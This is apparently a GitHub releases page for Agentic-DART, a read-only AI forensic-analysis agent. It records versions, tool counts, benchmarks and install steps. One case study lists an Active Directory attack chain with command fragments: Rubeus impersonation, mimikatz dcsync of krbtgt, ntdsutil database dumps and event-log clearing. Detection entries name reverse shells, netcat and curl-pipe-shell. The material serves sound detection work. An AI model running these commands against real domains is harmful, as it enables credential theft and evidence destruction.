Releases: Juwon1405/agentic-dart
v1.2.0 — SANS Find Evil! 2026
Agentic-DART v1.2.0 — SANS Find Evil! 2026 submission build.
Autonomous DFIR agent on the SANS SIFT Workstation. The language model analyzes evidence in read-only mode and seals every inference into a SHA-256 audit chain. 73 typed, read-only MCP tools (48 native pure-Python + 25 SIFT-tool adapters) — destructive operations are absent from the tool registry and CI-enforced, so even a fully successful prompt injection has no destructive function to call. Architecture-first, not prompt-first.
This release
- Sigma detection pack v2 — 11 rules (DCSync, Golden Ticket, ransomware shadow-copy deletion, web-shell creation, local account creation, Kerberoasting, AS-REP roasting, HID insertion, remote exec, event-log clearing).
- Model-aware authentication — Haiku resolves to an OAuth subscription token; Sonnet/Opus to a metered API key. New
dart-authcommand. - Persistent install aliases —
dart-pull,dart-auth. - Unified per-case ledger — append-only, per-case timestamps.
- case-02 ground-truth fix — Hadi Challenge #1 is Windows XAMPP, not Linux; recall 0% -> 60%.
142 tests passing. Full history in CHANGELOG.md.
v1.1.0 — Stable release (SANS FIND EVIL! 2026)
Agentic-DART is an autonomous DFIR agent on the SANS SIFT Workstation. It runs a senior-analyst reasoning loop over a custom MCP server of 73 typed, read-only forensic tools (48 native pure-Python + 25 SIFT adapters) and produces a courtroom-traceable report. Evidence integrity is enforced by the shape of the system — destructive operations (execute_shell, write_file, mount) simply do not exist on the wire — not by asking the model to behave.
This is the first genuinely stable release, verified end-to-end from a clean clone.
Why 1.1.0 supersedes everything before it
Earlier tags that claimed "stable" did not actually run clean in a fresh environment. 1.1.0 is the result of a full correctness pass — install, benchmark, scoring, external disk-image handling, and the test suite all fixed and re-verified. The prior 1.0.2 "stable" tag has been removed to avoid confusion.
- Tests are green from anywhere. 156 tests pass. The Phase-2 placeholder suite is now explicitly skipped (not failed) wherever it's collected, so
pytestis clean whether you run it from the repo root or any subdirectory. - No version is pinned in docs or tests. The release number lives in
pyproject.tomlonly; READMEs, the wiki, the site, and the version test were all genericized, so a future bump touches one file.
Highlights
- 73 typed read-only MCP tools — 48 native forensic functions + 25 SIFT adapters (Volatility 3, MFTECmd, EvtxECmd, PECmd, RECmd, AmcacheParser, YARA, Plaso), plus a versioned Sigma detection-rule matcher.
- 11 case studies / 99 ground-truth findings across two tiers: 8 internal self-evaluation cases (ready evidence) + 3 external full-disk public images (NIST CFReDS Hacking Case, Ali Hadi DFIR Challenge #1, Digital Corpora M57).
- External is a first-class tier. Full-disk images are adapted via
ewfmount+mmls+tsk_recover(partition-offset aware) into an evidence tree, then analyzed. Run the tiers as separate processes —scripts.eval.demo/scripts.eval.self/scripts.eval.external— each independently debuggable; an append-onlydocs/benchmarks/HISTORY.mdrecords every self/external run. - Linux-only host, hardened installer — refuses to run under sudo, stages the full toolchain, verifies it, and offers to fetch the external images at the end.
Requirements / dependencies
Host OS — Linux only. Verified on the SANS SIFT Workstation (Ubuntu 22.04); RHEL / Rocky / AlmaLinux 8+ and Fedora work via dnf/yum. macOS and Windows are not supported as the host — the Plaso / libyal toolchain does not build cleanly there. Default shell is bash.
| Requirement | Version | Verified |
|---|---|---|
| Python | 3.10+ (CI: 3.10 – 3.13) | 3.10, 3.12 |
| OS | Ubuntu 22.04 (SANS SIFT) primary; RHEL/Rocky/Alma 8+, Fedora | SIFT |
Python libraries (lower bounds; installed by scripts/install.sh):
| Library | Minimum | Role |
|---|---|---|
anthropic |
≥ 0.40 | Claude API client (live mode) |
mcp |
≥ 1.0 | MCP client/server transport |
duckdb |
≥ 1.5.3, < 2.0 | in-memory correlation store |
python-registry |
≥ 1.3 | Windows registry hive parsing |
PyYAML |
≥ 6.0 | playbook / Sigma rule loading |
requests |
≥ 2.25 | dataset download (benchmarks) |
External forensic tools (staged by the installer; SIFT ships most): sleuthkit (mmls, tsk_recover), ewfmount (ewf-tools / libewf), Volatility 3, Plaso (log2timeline.py, psort.py), EZ Tools, YARA, Velociraptor.
Install
git clone https://github.com/Juwon1405/agentic-dart.git
cd agentic-dart
bash scripts/install.sh # Linux only; refuses sudo. Offers to fetch external images (~13 GB).
export ANTHROPIC_API_KEY='sk-ant-...'
python3 -m scripts.eval.demo # deterministic, no key
python3 -m scripts.eval.self --models claude-haiku-4-5-20251001 # 8 bundled cases
python3 -m scripts.eval.external --models claude-haiku-4-5-20251001 # public disk imagesLicense: MIT. SANS FIND EVIL! 2026 submission.
v1.0.1 — Platform overhaul: run_eval CLI, tiered case layout, OS-aware installer
Highlights
run_eval.py— the new primary user-facing command. Live mode only: fails fast with an actionable message whenANTHROPIC_API_KEYis unset; discovers cases dynamically from both tiers; writesout/<tier>/<case-id>/<timestamp>/{findings,report,summary}.json.- Tiered, self-contained case studies —
examples/case-studies/self-evaluation/case-01..08andexternal-evaluation/case-01..03(NIST CFReDS, Ali Hadi, Digital Corpora M57-Patents/Jo). Index-only folder names,truth.jsonper case, canonical bundled evidence atself-evaluation/case-01/evidence_root/. The public--variantselector is gone. - OS-aware installer —
scripts/install.sh --os auto|ubuntu|centos|macos, venv-first, clones+installs the collector adapter, optional SIFT (--install-sift, via cast) and Eric Zimmerman Tools (--install-eztools, .NET 9 builds, URLs validated before download). Plus rootrequirements.txtand an API-freescripts/healthcheck.py. - Downloader hardening — browser-like headers on every request (incl. resumed range requests), pure-Python streaming split-image reassembly,
--dry-run/--check-urls. - Hardening (earlier in this line) — MCP
call_tool()schema validation before dispatch, Plaso outputs isolated toDART_DERIVED_ROOT, benchmark summary no longer fabricates rows, hallucination scoring requires resolvable audit IDs.
Measured QA at this tag
- Full pytest suite green (
tests/+dart_corr/tests/);benchmark-integrityandCIworkflows green on this commit. scripts/measure_accuracy.py: recall 1.0, FPR 0.0, hallucinations 0, evidence integrity preserved (67 files).validate_ground_truth.py: FAIL 0 (6 documented external-tier warnings).
Known limitations
- The adapter's
--source image(Velociraptor dead-disk) path is covered by mocked end-to-end tests and has not been exercised against a live Velociraptor binary in CI. - External-tier evaluations require a one-time multi-GB dataset download; no external-dataset accuracy numbers are claimed at this tag.
Full details: CHANGELOG.md
v0.7.1 — Linux DFIR triplet + ground-truth function reconciliation
Highlights
Closed 6 of 10 missing-function gaps identified by post-release MCP surface audit against the 11-case ground-truth library.
Added — Linux DFIR triplet (2 new MCP functions)
parse_linux_text_log— parses Apache/nginx combined access logs, syslog (RFC3164),/var/log/messages,/var/log/secure, and auditd dispatcher text mode. Returns parsed records plus suspicious-content tags across 10 patterns covering T1003.008 shadow read, T1190 path traversal + SQLi, T1505.003 webshell patterns, T1105 remote download to shell, T1071.001 netcat, T1046 scanner invocation, T1222.002 dangerous chmod, T1059.004 reverse-shell oneliners, T1213.002 database credential use, plus a scanner-user-agent meta-rule (T1595.002).parse_linux_shell_history— parses bash/zsh history with HISTTIMEFORMAT awareness (epoch comment lines). Detects 11 attacker patterns including T1098.004 SSH key persistence, T1070.003 history clear, T1053.003 cron mutation, T1027 base64 obfuscation.
(parse_linux_cron_jobs already existed in v0.6.1 — exposed via evidence_root + flagged_only schema. Not duplicated.)
Changed — case-09 ground-truth function names reconciled
Pre-v0.7.1 case-09 (Ali Hadi Challenge 1) referenced three functions that did not exist in the MCP surface. Now mapped to actual capabilities:
| Finding | Pre-v0.7.1 (missing) | v0.7.1 (implemented) |
|---|---|---|
| F-HADI1-002 | detect_web_shell_indicators |
detect_webshell |
| F-HADI1-007 | enumerate_filesystem_anomalies |
parse_linux_text_log |
| F-HADI1-009 | detect_log_tampering_indicators |
detect_defense_evasion |
Ground-truth coverage post-reconciliation
Of 36 expected functions referenced across all 11 cases:
- 32 implemented (89%)
- 4 remain as tracked Phase 2 gaps:
parse_recycle_bin_metadata(#54),parse_ie_history(#53),parse_outlook_dbx(#55),parse_usn_journal(post-release issue)
Added — test coverage
tests/test_parse_linux_dfir.py — 7 new tests covering auditd dispatcher format, http access combined format (Nikto UA + path traversal + shadow read), HISTTIMEFORMAT epoch parsing, per-hit required-keys contract, missing-file error contract, path traversal rejection. Total suite: 75 green (up from 68).
Added — sample evidence
examples/sample-evidence-realistic/linux/cron/sample.crontab — fixture exercising v0.6.1 parse_linux_cron_jobs with 4 suspicious patterns (remote-pipe-shell, exec from world-writable, reverse-shell oneliner, base64 obfuscation) plus benign baseline jobs.
Post-release counts
| Surface | Value |
|---|---|
| Native MCP functions | 72 (was 67) |
| Total ground-truth findings | 99 |
| Ground-truth coverage (implemented / expected) | 32 / 36 (89%) |
| Bundled case studies | 11 |
| Unit tests | 75 green (was 68) |
Verification
recall: 1.000 (F-001 + F-013)
false_positive_rate: 0.000
hallucination_count: 0
evidence_integrity_preserved: true
self_correction_observed: true
Compare: v0.7.0...v0.7.1
v0.7.0 — case-11 supply-chain/ESC8 + evidence schema fidelity
Highlights
Two major additions targeted at SANS FIND EVIL! 2026 submission.
case-11 supply-chain entry → AD certificate-services abuse
examples/case-studies/case-11-supplychain-ad-zeroday/ ships 12 ground-truth findings reproduced deterministically by seven MCP functions on bundled evidence. The chain:
- Trojanized signed vendor binary (SolarWinds SUNBURST class entry, T1195.002)
- Low-and-slow C2 beaconing with calibrated sub-SIEM-threshold cadence
- PetitPotam (CVE-2021-36942) coercion of
DC01$(T1187) - ntlmrelayx
--adcsrelay to CA01 Web Enrollment endpoint (T1557.001) - Certificate issued for
DC01$under DomainController template (ESC8, T1649) - Rubeus
asktgt /certificate+s4u /impersonateuser:domadmin(T1550.003) - 4624 type-9 NewCredentials on DC (S4U2self DA impersonation)
- PsExec / wmiexec overpass-the-hash lateral to DC, file server, endpoint (T1021.002, T1021.006, T1550.002)
- ntdsutil
ifm create full(T1003.003) + mimikatzdcsync /user:krbtgt(T1003.006) - AdminSDHolder ACL modification (T1098.005 — self-healing privileged persistence via SDProp)
- Golden Ticket forged with KRBTGT hash (T1558.001) used next morning
- Three sequential
wevtutil cl+ EventID 1102 self-emission (T1070.001)
Chain composed entirely from public references (CISA AA20-352A, SpecterOps "Certified Pre-Owned", MS-EFSRPC CVE, MITRE T1098.005/T1003.006/T1558.001). All hosts/IPs/domain (ent.example.local)/SIDs are RFC1918/RFC5737/RFC2606 synthetic with zero cross-reference to any real environment.
Every sample evidence file enriched to native forensic-tool dump fidelity
Prior versions of sample-evidence-realistic/ files were too sparse to look like genuine forensic-tool captures. This release replaces every file with the on-disk schema produced by the corresponding real tool — without breaking any detection.
| Surface | Now matches output of |
|---|---|
| Windows event logs | EvtxECmd (full EVTX field set, ms timestamps, consistent SIDs) |
| Network flows | Zeek conn.log (uid, ja3, ja3s, tls_version, http_method, user_agent) |
| $MFT | MFTECmd 25-column (both 0x10 SI and 0x30 FN timestamps, USN, LSN, SecurityId) |
| Shellbags | SBECmd (BagPath, NodeSlot, AbsolutePath, LastInteracted, HasExplored) |
| Run keys / services / shimcache | RECmd / AppCompatCacheParser |
| Prefetch | PECmd JSON (Volumes, FilesLoaded, run times) |
| Chrome History | Hindsight (transition, danger_type, opened, referrer, etag) |
| Linux journal | systemd-journald (__REALTIME_TIMESTAMP, _BOOT_ID, _MACHINE_ID, _AUDIT_LOGINUID) |
| Linux auditd | SYSCALL+EXECVE+CWD+PATH+PROCTITLE+USER_LOGIN+CRED_ACQ+USER_CMD+USER_AUTH |
| macOS unified log | log show (thread, type, subsystem, category, sender) |
| macOS FSEvents | FSEventsParser (id, mask, flags, inode, node_id, sha256_at_event) |
| Memory image info | winpmem metadata (kernel_base, KDBG offset, physical layout, yara hits) |
Fixed
setupapi.dev.logwas missing from realistic variant — agent F-013 IP-KVM detection silently failed and dropped recall to 0.5 on--variant realistic. Restored with full setupapi log fidelity around the IP-KVM (VID 0557 PID 2419 ATEN) signal.
Post-release counts
| Surface | Value |
|---|---|
| Native MCP functions | 67 |
| Total ground-truth findings | 99 |
| ↳ Layer 1 (8 cases: 01–07 + 11) | 69 |
| ↳ Layer 2 (3 cases: 08 CFReDS, 09 Hadi, 10 M57) | 30 |
| Bundled case studies | 11 |
| Evidence files in realistic variant | 49 |
| MITRE ATT&CK tactic coverage | 11 of 12 |
| Unit tests | 68 green |
Verification
recall: 1.000 (F-001 + F-013)
false_positive_rate: 0.000
hallucination_count: 0
evidence_integrity_preserved: true
self_correction_observed: true
audit_chain_length: 3 entries, SHA-256-linked
Full Changelog
See CHANGELOG.md for the complete diff.
Compare: v0.6.1...v0.7.0
v0.6.1 — macOS quarantine + Linux cron + DNS tunneling
Three new native MCP functions, plus the Single-Source-of-Truth cleanup that closes the v0.6.0 drift loop.
Added
| Function | Purpose | MITRE |
|---|---|---|
parse_macos_quarantine |
macOS LSQuarantineEvent reader — download provenance, non-browser downloader flagging, pastesite/raw-IP/darknet origin detection |
T1204, T1566.002, T1105 |
parse_linux_cron_jobs |
Enumerate /etc/crontab, cron.d/, cron.{hourly,daily,weekly,monthly}/, /var/spool/cron/ — flag curl-pipe-shell, base64 decode, @reboot triggers, /tmp/*.sh, netcat listeners |
T1053.003, T1059.004, T1546 |
detect_dns_tunneling |
DNS query log analysis (BIND9/dnsmasq/generic) — Shannon entropy + long-label + rare-qtype + volume + Iodine/dnscat2 signatures. Opens TA0011 (Command-and-Control) coverage | T1071.004, T1568.002, T1572 |
17 new unit tests in test_v06_macos_linux.py. Full test suite passes on a clean clone.
Fixed
- CI workflow (
ci.yml),examples/sift-adapter-demo.sh, andscripts/install.shno longer hardcode native/total counts. Drift-safe invariant checks (count > 0, native + sift == total, no forbidden tool names) replaced exact-count assertions. - This was the root cause of ten consecutive failed CI runs between v0.6.0 (2026-05-13) and the SoT cleanup commit on 2026-05-14.
Changed
- Companion repo agentic-dart-collector-adapter flipped from Apache-2.0 to MIT for ecosystem consistency.
- Hardcoded counts removed from ~25 locations across README body, docs, wiki, and profile surfaces. Numbers now live only in: README L92+L259 Hero, DEVPOST_SUBMISSION.md, DEMO_STORYBOARD.md, and
tests/test_mcp_surface.pycanonical name set.
Surface
Runtime list_tools() returns the typed read-only MCP surface (45 native pure-Python forensic functions + 25 SIFT Workstation adapters). The canonical name set is asserted in tests/test_mcp_surface.py::test_registered_tools_are_exact_set.
Full changelog: CHANGELOG.md
v0.5.4 — NIST CFReDS Hacking Case integration
NIST CFReDS Hacking Case integration — external benchmark validation
This release adds external benchmark validation against the NIST CFReDS "Hacking Case" (Greg Schardt / Mr. Evil) — a community-trusted forensic dataset with published ground-truth answers.
Highlights
- 🆕 New primitive:
parse_registry_hive(general native registry hive parser) - 🆕 New case study:
case-08(CFReDS Hacking Case full traversal) - 📊 3-tier accuracy evaluation now documented in
docs/accuracy-report.md:
| Tier | Dataset | recall (v0.5.4) |
|---|---|---|
| 1 | Synthetic reference (CI baseline) | 1.000 / FPR=0.000 |
| 2 | Noise-injected realistic (~1:30 IOC:benign) | 1.000 / FPR=0.000 |
| 3 | NIST CFReDS Hacking Case | 0.50 strict / 0.80 lenient |
- 🚀 5× CFReDS recall jump from v0.5.3 (0.10 / 0.40) after
parse_registry_hiveshipped — unlocked 4 findings at once (closes #52) - ✅ 43/43 tests pass on Python 3.10/3.11/3.12/3.13 matrix
- 📦 61 MCP tools (36 native + 25 SIFT adapters), all read-only
Why this matters
Synthetic recall=1.000 by itself looks too good to be true. v0.5.4 lets us state honestly that external benchmark recall is 0.50/0.80, and trace the remaining gap to specific paradigm differences — turning "registry parsing is on the wishlist" into "registry parsing unlocks 4 measured findings, ship next."
What's next (Phase 2)
- #53 IE6
index.datparser - #54 Recycle Bin
INFO2parser - #55 Bundled YARA rule library
- #47 Additional external datasets (Ali Hadi, DFRWS, BOTS)
Reference
- Submission target: SANS FIND EVIL! 2026 (findevil.devpost.com)
- Deadline: 2026-06-15 23:45 EDT (JST 2026-06-16 12:45 PM)
- Accuracy methodology: docs/accuracy-report.md